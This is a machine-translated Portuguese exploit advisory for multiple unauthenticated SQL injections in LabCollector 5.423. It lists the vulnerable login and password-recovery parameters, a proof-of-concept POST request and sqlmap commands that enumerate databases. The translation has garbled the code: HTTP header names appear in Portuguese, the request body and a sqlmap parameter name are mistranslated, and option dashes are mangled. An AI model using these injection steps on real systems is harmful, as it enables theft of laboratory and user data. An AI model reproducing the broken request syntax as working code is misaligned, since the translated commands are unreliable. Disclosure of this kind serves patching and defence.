LabCollector 5.423 – SQL Injection

# Exploit Title: LabCollector (Sistema de Informação do Laboratório) 5.423 – Injeção SQL Múltipla
# Data: 09/09/2019
# Links / projeto de software: https://www.labcollector.com/clientarea/downloads.php
# Versão: LabCollector (Sistema de Informação do Laboratório) 5.423
# Exploit Autor: Carlos Avila
# Categoria: webapps
# Testado em: Debian 9 / Win10
# Contato: http://twitter.com/badboy_nt

1. Descrição

O LabCollector Lab Services Manager (LSM) é um aplicativo baseado em rede que ajuda laboratórios, instalações principais, biotecnologias que prestam serviços a clientes ou parceiros para acompanhar as amostras que chegam para processamento, rastrear status e gerar relatórios. O gerenciamento de cobrança também é possível. LSM é um software LIMS de serviços de laboratório simples e completo. Totalmente configurável pelo usuário, pode ser adaptado a qualquer situação.

Isso permite que um invasor remoto não autenticado execute comandos SQL arbitrários e obtenha informações particulares. Credenciais válidas de administrador ou de usuários não são necessárias. Em uma análise mais aprofundada, outras páginas também são afetadas pela vulnerabilidade sobre outras entradas.

Escrito em PHP, é vulnerável à injeção de SQL em múltiplas ocorrências. Os parâmetros afetados estão detalhados abaixo:

http://192.168.0.102/labcollector/html/login.php [parâmetros afetados pelo método POST: login]
http://192.168.0.102/labcollector/html/retrieve_password.php (parâmetros afetados pelo método POST: user_name)

2. Prova de conceito

————————————————– ————————————————– ——————————
Solicitação de postagem:

POST /labcollector/html/login.php HTTP / 1.1
Host: 192.168.0.102
Agente do usuário: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10.14; rv: 68.0) Gecko / 20100101 Firefox / 68.0
Aceitar: texto / html, aplicativo / xhtml + xml, aplicativo / xml; q = 0,9, * / *; q = 0,8
Idioma de aceitação: en-US, en; q = 0,5
Accept-Encoding: gzip, deflate
Tipo de conteúdo: application / x-www-form-urlencoded
Comprimento do conteúdo: 113
DNT: 1
Conexão: fechar
Referer: http://192.168.0.102/labcollector/html/login.php
Cookie: PHPSESSID = cio2kpq89f4da0b1fhakfn68k7
Solicitações de atualização insegura: 1

login = teste e aprovação = hola & action = login e envio = Entrar + entrar

————————————————– ————————————————– ——————————

Todos os testes foram realizados em um ambiente controlado e local.

domingo: sqlmap badboy_nt $ python sqlmap.py -r SQLI-LabCollectorLogin –random-agent –tamper randomcase -p login –dbms mysql –dbs

domingo: sqlmap badboy_nt $ python sqlmap.py -r SQLI-LabCollectorLogin2 –random-agent –tamper randomcase -p nome_do_usuário –dbms mysql -f

3. Solução:

As entradas do aplicativo devem ser validadas corretamente durante todo o desenvolvimento do projeto.